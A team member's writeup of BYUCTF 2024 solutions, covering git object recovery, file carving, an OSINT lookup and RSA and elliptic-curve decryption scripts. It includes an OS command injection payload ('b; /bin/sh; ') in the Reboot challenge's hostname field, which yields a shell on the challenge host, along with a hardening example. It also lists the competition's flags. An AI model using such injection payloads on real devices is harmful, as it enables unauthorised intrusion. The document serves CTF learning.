BYUCTF 2024 Writeup

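This competition was held from 2024/5/17 9:00 (JST) to 2024/5/19 9:00 (JST).
I took part with a team again this time. We finished 205th out of 1230 teams with 1564 points.
Below are writeups for the challenges I solved myself.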

Sanity Check (Misc)

The flag was at the very bottom of the rules page.

byuctf{th4nks_f0r_r34d1ng_d4_rul3s}

Gitting Started (Misc)

$ git clone https://gitlab.com/TheITFirefly/tech-blog 
Cloning into 'tech-blog'...
warning: redirecting to https://gitlab.com/TheITFirefly/tech-blog.git/
remote: Enumerating objects: 54, done.
remote: Counting objects: 100% (54/54), done.
remote: Compressing objects: 100% (36/36), done.
remote: Total 54 (delta 13), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (54/54), 22.47 KiB | 1.18 MiB/s, done.
Resolving deltas: 100% (13/13), done.
$ git init newrepo
hint: Using 'master' as the name for the initial branch. This default branch name
hint: is subject to change. To configure the initial branch name to use in all
hint: of your new repositories, which will suppress this warning, call:
hint: 
hint:   git config --global init.defaultBranch <name>
hint: 
hint: Names commonly chosen instead of 'master' are 'main', 'trunk' and
hint: 'development'. The just-created branch can be renamed via this command:
hint: 
hint:   git branch -m <name>
Initialized empty Git repository in /XXX/XXX/newrepo/.git/
$ cd newrepo/.git
$ git unpack-objects < ../../tech-blog/.git/objects/pack/pack-3ff894f22f9b30e1dd3bc9351947d234c0554913.pack
Unpacking objects: 100% (54/54), 22.45 KiB | 2.49 MiB/s, done.

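Use a script to walk through the unpacked objects one by one and find the one that contains the flag.

#!/usr/bin/env python3
# Run from inside newrepo/.git, where the loose objects were unpacked.
import os
import zlib

found = False
for subdir in os.listdir('objects'):
    dir_name = os.path.join('objects', subdir)
    for name in os.listdir(dir_name):
        file_name = os.path.join(dir_name, name)
        # A loose object is zlib-compressed: "<type> <size>\0<content>"
        with open(file_name, 'rb') as f:
            data = zlib.decompress(f.read())
        if b'byuctf{' in data:
            found = True
            print(data.decode())
            break
    if found:
        break

The output is as follows.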

blob 272+++
title = 'My First Post'
date = 2024-04-22T23:50:55-06:00
draft = false
+++
## Introduction

This is **bold** text, and this is *emphasized* text.

Fun fact, git has some weirdness in how it stores commits. byuctf{g1t_gud!}

Visit the [Hugo](https://gohugo.io) website!

byuctf{g1t_gud!}

Reboot (IoT)

OS command injection is possible.
The location of flag.txt is unknown.
The hostname can be at most 30 bytes.
To make it easy to move around, inject /bin/sh.

nc reboot.chal.cyberjousting.com 1358
=== MENU ===
1. Set hostname
2. Reboot

Choice: 1   
Enter new hostname (30 chars max): b; /bin/sh; 
=== MENU ===
1. Set hostname
2. Reboot

Choice: 2
Rebooting...
::1     localhost ip6-localhost ip6-loopback
172.18.0.2      6bdbe4a55e2f
id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
python3 -c 'import pty; pty.spawn("/bin/bash")'
bash: /root/.bashrc: Permission denied
ctf@6bdbe4a55e2f:/ctf$ ls
ls
clean.sh  server.py  start.sh  xinetd.sh
ctf@6bdbe4a55e2f:/ctf$ cd /
cd /
ctf@6bdbe4a55e2f:/$ ls
ls
bin   ctf  etc   lib    media  ohno  proc  run   srv  tmp  var
boot  dev  home  lib64  mnt    opt   root  sbin  sys  usr
ctf@6bdbe4a55e2f:/$ cd ohno
cd ohno
ctf@6bdbe4a55e2f:/ohno$ ls
ls
i
ctf@6bdbe4a55e2f:/ohno$ cd i
cd i
ctf@6bdbe4a55e2f:/ohno/i$ ls
ls
hope
ctf@6bdbe4a55e2f:/ohno/i$ cd hope
cd hope
ctf@6bdbe4a55e2f:/ohno/i/hope$ ls
ls
this
ctf@6bdbe4a55e2f:/ohno/i/hope$ cd this
cd this
ctf@6bdbe4a55e2f:/ohno/i/hope/this$ ls
ls
isnt
ctf@6bdbe4a55e2f:/ohno/i/hope/this$ cd isnt
cd isnt
ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt$ ls  
ls
too
ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt$ cd too
cd too
ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt/too$ ls
ls
long
ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt/too$ cd long
cd long
ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt/too/long$ ls
ls
is
ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt/too/long$ cd is
cd is
ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt/too/long/is$ ls
ls
this
ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt/too/long/is$ cd this
cd this
ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt/too/long/is/this$ ls
ls
messing
ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt/too/long/is/this$ cd messing
cd messing
ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt/too/long/is/this/messing$ ls
ls
you
ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt/too/long/is/this/messing$ cd you
cd you
ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt/too/long/is/this/messing/you$ ls
ls
up
ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt/too/long/is/this/messing/you$ cd up
cd up
ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt/too/long/is/this/messing/you/up$ ls
ls
lol
ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt/too/long/is/this/messing/you/up$ cd lol
<e/this/isnt/too/long/is/this/messing/you/up$ cd lol                     
ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt/too/long/is/this/messing/you/up/lol$ ls
<e/this/isnt/too/long/is/this/messing/you/up/lol$ ls                         
arent
ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt/too/long/is/this/messing/you/up/lol$ cd arent
</isnt/too/long/is/this/messing/you/up/lol$ cd arent                         
<is/isnt/too/long/is/this/messing/you/up/lol/arent$ ls
ls
ctfs
<is/isnt/too/long/is/this/messing/you/up/lol/arent$ cd ctfs
cd ctfs
<nt/too/long/is/this/messing/you/up/lol/arent/ctfs$ ls
ls
so
<nt/too/long/is/this/messing/you/up/lol/arent/ctfs$ cd so
cd so
<too/long/is/this/messing/you/up/lol/arent/ctfs/so$ ls
ls
much
<too/long/is/this/messing/you/up/lol/arent/ctfs/so$ cd much
cd much
<ong/is/this/messing/you/up/lol/arent/ctfs/so/much$ ls
ls
fun
<ong/is/this/messing/you/up/lol/arent/ctfs/so/much$ cd fun
cd fun
<is/this/messing/you/up/lol/arent/ctfs/so/much/fun$ ls
ls
f19eaee3a4e2b88563b31c7c17e2ab33
<is/this/messing/you/up/lol/arent/ctfs/so/much/fun$ cat f19eaee3a4e2b88563b31c7c17e2ab33
<s/so/much/fun$ cat f19eaee3a4e2b88563b31c7c17e2ab33
byuctf{expl0iting_th1s_r3al_w0rld_w4s_s000_ann0ying}

byuctf{expl0iting_th1s_r3al_w0rld_w4s_s000_ann0ying}
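
The root cause and its fix, as an added example that is not part of the original writeup or the challenge source. server.py is not shown on the page, so the `hostname <input>` command line is an assumption; the payload and the 30-character limit are taken from the session above.

```python
import re
import shlex

MAX_LEN = 30                      # limit shown in the challenge menu
SHELL_OPERATORS = set(";&|()<>")  # control/redirection characters shlex splits out
# RFC 1123 label: letters, digits and hyphens, not starting or ending with a hyphen.
LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")

PAYLOAD = "b; /bin/sh; "          # hostname entered in the session above


def unsafe_command(hostname: str) -> str:
    """Assumed vulnerable pattern: input pasted into a shell command line."""
    return f"hostname {hostname}"


def shell_tokens(command_line: str) -> list[str]:
    """Tokenize roughly as a POSIX shell would, keeping operators as tokens."""
    return list(shlex.shlex(command_line, posix=True, punctuation_chars=True))


def injects_commands(command_line: str) -> bool:
    """True when the line carries shell operators, i.e. more than one command."""
    return any(tok and set(tok) <= SHELL_OPERATORS
               for tok in shell_tokens(command_line))


def safe_argv(hostname: str) -> list[str]:
    """Hardened pattern: allow-list validation, then an argv list with no shell."""
    labels = hostname.split(".")
    if len(hostname) > MAX_LEN or not all(LABEL.fullmatch(l) for l in labels):
        raise ValueError(f"invalid hostname: {hostname!r}")
    return ["hostname", hostname]  # for subprocess.run(argv), shell=False


if __name__ == "__main__":
    print(shell_tokens(unsafe_command(PAYLOAD)))
    print(injects_commands(unsafe_command(PAYLOAD)))
    print(safe_argv("web-01"))
```

A length limit alone does not help here: the payload is 12 characters, well under the 30-character cap.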

Mail Time (OSINT)

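Run an image search for "POST OFFICE STANLEY crown". Taking the window in the upper part of the image into account, the page that looks like a match is the following.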

https://www.alamy.com/stock-photo-great-britain-the-falkland-islands-port-stanley-house-facade-sign-123024275.html?imageid=84BA7368-9C8D-4936-8BFA-E7A0BF7274FD&p=75528&pn=1&searchId=0ce7f9e5cede420d5123c50c8c6c2a63&searchtype=0

Look up the address of the corresponding "Falklands Post Service Ltd" on Google Maps.

845P+98W, Ross Rd, Stanley FIQQ 1ZZ, Falkland Islands (Islas Malvinas)
byuctf{845P+98W, Ross Rd, Stanley FIQQ 1ZZ, Falkland Islands (Islas Malvinas)}

Who Am I (Forensics)

Looking at the file properties, the author is listed as follows.

Ryan Sketchy
byuctf{Ryan Sketchy}

Advanced Steak (Forensics)

Mad Cow.001 presumably contains data in the .cow format. Judging from the two .cow files, this format appears to start and end as follows.

Start: "\x13\x37\xbe\xef"
End: "Mooo"

On that assumption, extract the .cow data from Mad Cow.001 and save it as flag.cow.

#!/usr/bin/env python3
with open('Mad Cow.001', 'rb') as f:
    data = f.read()

# Carve from the start marker to the first end marker that follows it
start = data.index(b'\x13\x37\xbe\xef')
end = data.index(b'Mooo', start) + 4

with open('flag.cow', 'wb') as f:
    f.write(data[start:end])

Convert this file to a PNG with cow_decryptor.py.

$ python3 cow_decryptor.py -i flag.cow -o flag.png

The flag was written in the converted PNG image.

byuctf{incredi-bull}

The Worst Challenge Ever (Forensics)

Decode the length of each run of "\x00" bytes terminated by "\x01" as an ASCII code.

#!/usr/bin/env python3

with open('justterrible.txt', 'rb') as f:
    data = f.read()

run = 0      # number of consecutive 0x00 bytes seen so far
flag = ''
for d in data:
    if d == 0:
        run += 1
    elif d == 1:
        # 0x01 ends the run; its length is one character code
        flag += chr(run)
        run = 0

print(flag)

byuctf{wh4ts_4_nu11_byt3_4nyw4ys}

Are S A? (Crypto)

n is prime, so φ(n) = n - 1 and decryption is straightforward.

#!/usr/bin/env python3
from Crypto.Util.number import *

with open('cne.txt', 'r') as f:
    params = f.read().splitlines()

n = int(params[0].split(' ')[-1])
e = int(params[1].split(' ')[-1])
c = int(params[2].split(' ')[-1])

assert isPrime(n)

phi = n - 1
d = inverse(e, phi)
m = pow(c, d, n)
flag = long_to_bytes(m).decode()
print(flag)

byuctf{d1d_s0m3_rs4_stuff...m1ght_d3l3t3_l4t3r}

Do Math! (Crypto)

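p * getPrime(1024) % n is divisible by p, and the same holds for q. In the hints, n appears as n - 1, so n is known. Taking the GCD of n and p * getPrime(1024) % n gives p. After that, decrypt as usual.

#!/usr/bin/env python3
import ast
from Crypto.Util.number import GCD, long_to_bytes

with open('hints.txt', 'r') as f:
    params = f.read().splitlines()

c = int(params[0])
# Parse the list literal without evaluating arbitrary code
hints = ast.literal_eval(params[3])

e = 0x10001
n = hints[3] + 1          # the hint holds n - 1
p = GCD(hints[0], n)      # hint is a multiple of p, reduced mod n
q = GCD(hints[1], n)      # hint is a multiple of q, reduced mod n
assert n == p * q

phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)
m = pow(c, d, n)
flag = long_to_bytes(m).decode()
print(flag)

byuctf{th3_g00d_m4th_1snt_th4t_h4rd}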
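
Why the GCD step works, as an added example that is not part of the original writeup or the challenge source. The primes, multipliers and the three-value hint layout are constructed toy values; it also covers the one case where the hint fails to split n.

```python
from math import gcd


def make_hints(p, q, r1, r2):
    """Constructed leak: multiples of each prime reduced mod n, plus n - 1."""
    n = p * q
    return p * r1 % n, q * r2 % n, n - 1


def recover_factors(hint_p, hint_q, n_minus_1):
    """p*r mod (p*q) equals p*(r mod q), so gcd(hint, n) exposes p."""
    n = n_minus_1 + 1
    p, q = gcd(hint_p, n), gcd(hint_q, n)
    if p * q != n or 1 in (p, q):
        # Happens when r is a multiple of the other prime (hint is 0 mod n).
        raise ValueError("hints do not split n")
    return p, q


def decrypt(c, e, hint_p, hint_q, n_minus_1):
    """Standard RSA decryption once the factors are known."""
    p, q = recover_factors(hint_p, hint_q, n_minus_1)
    d = pow(e, -1, (p - 1) * (q - 1))
    return pow(c, d, p * q)


# Constructed toy parameters (far too small for real use).
P, Q, E = 1009, 1013, 65537
HINTS = make_hints(P, Q, 10007, 10009)

if __name__ == "__main__":
    message = 123456
    ciphertext = pow(message, E, P * Q)
    print(recover_factors(*HINTS))
    print(decrypt(ciphertext, E, *HINTS))
```

Any value published alongside n that is a multiple of p or q, even after reduction mod n, is equivalent to publishing the factor itself.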

Times (Crypto)

Once the scalar multiplication on the elliptic curve is performed, the AES key can be computed. Then decrypt using that key and the known IV.

#!/usr/bin/env sage
import hashlib
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
from base64 import b64decode

p = 335135809459196851603485825030548860907
a = 13
b = 245
G = (14592775108451646097, 237729200841118959448447480561827799984)

ciphertext = b'SllGMo5gxalFG9g8j4KO0cIbXeub0CM2VAWzXo3nbIxMqy1Hl4f+dGwhM9sm793NikYA0EjxvFyRMcU2tKj54Q=='
iv = b'MWkMvRmhFy2vAO9Be9Depw=='
ciphertext = b64decode(ciphertext)
iv = b64decode(iv)

F = FiniteField(p)
E = EllipticCurve(F, [a, b])
start_point = E.point(G)
new_point = start_point * 1337

shared_secret = new_point[0]
sha1 = hashlib.sha1()
sha1.update(str(shared_secret).encode('ascii'))
key = sha1.digest()[:16]

cipher = AES.new(key, AES.MODE_CBC, iv)
flag = unpad(cipher.decrypt(ciphertext), AES.block_size).decode()
print(flag)

byuctf{mult1pl1c4t10n_just_g0t_s0_much_m0r3_c0mpl1c4t3d}

Survey (Misc)

After answering the survey, the flag was displayed.

byuctf{6ngcy2hybj}